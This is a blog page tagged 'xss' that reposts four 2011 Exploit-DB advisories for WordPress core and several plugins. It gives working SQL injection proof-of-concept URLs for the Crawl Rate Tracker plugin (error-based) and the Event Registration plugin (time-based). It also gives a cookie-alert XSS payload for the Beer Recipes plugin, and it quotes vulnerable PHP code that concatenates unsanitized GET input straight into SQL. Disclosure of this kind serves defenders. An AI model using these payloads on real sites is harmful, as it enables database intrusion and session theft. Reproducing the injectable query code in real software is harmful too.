Posts Tagged ‘xss’

WordPress Crawl Rate Tracker plugin

Tuesday, September 6th, 2011


# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` < = '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`"); ... if ($_GET['chart_data']==1) { ... $chartData = new b3_chartData(); echo $chartData->tracking_bot_report_chart_data();

Fonte: http://www.exploit-db.com/exploits/17755/

WordPress Event Registration plugin

Tuesday, September 6th, 2011


# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$id= $_REQUEST['id'];
...
$sql = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'";
$result = mysql_query($sql);

Fonte: http://www.exploit-db.com/exploits/17751/

Exploit for WordPress core 3.1.3 Persistent SELF XSS Vulnerability

Monday, June 27th, 2011

Title: WordPress core 3.1.3 self-XSS

Author: Jelmer de Hen
Software link: http://wordpress.org/download/Version: 3.1.3
WordPress 3.1.3 has a self-XSS vulnerability in the following pages:/wp-admin/user-edit.php?user_id=<uid>/wp-admin/profile.php
By putting Javascript inside the input elements "first_name", "last_name" or "nickname" the self-XSS will trigger 3 times.

More information: http://h.ackack.net/0day-xss-in-wordpress-core.html

 

Fonte: http://www.exploit-db.com/exploits/17454/

Exploit for wordpress: WordPress Beer Recipes Plugin v.1.0 XSS

Monday, June 27th, 2011

# Exploit Title: WordPress - Beer Recipes v.1.0 XSS

# Google Dork: -
# Date: June / 25 / 2011
# Author: TheUzuki.'
# Software Link: http://opensourcebrew.org/beer-recipes-plugin/
# Version: v.1.0
# Tested on: Windows 7
# CVE : -
####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://opensourcebrew.org/beer-recipes-plugin/
#
# Author: TheUzuki.' from HF
# mail: uzuki[@]live[dot]de
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# Notes: You need to be User at the WordPress Board
#
####################################################################
--Description of WordPress Plugin--
Creates a custom post type for easily entering beer recipes into WordPress
--Exploit--
By Commenting a Beer Recip, with a javascript, the Javascripts,gets executed directly.
This causes a XSS.
--PoC--

<script>alert(document.cookie)</script>

 

Fonte: http://www.exploit-db.com/exploits/17453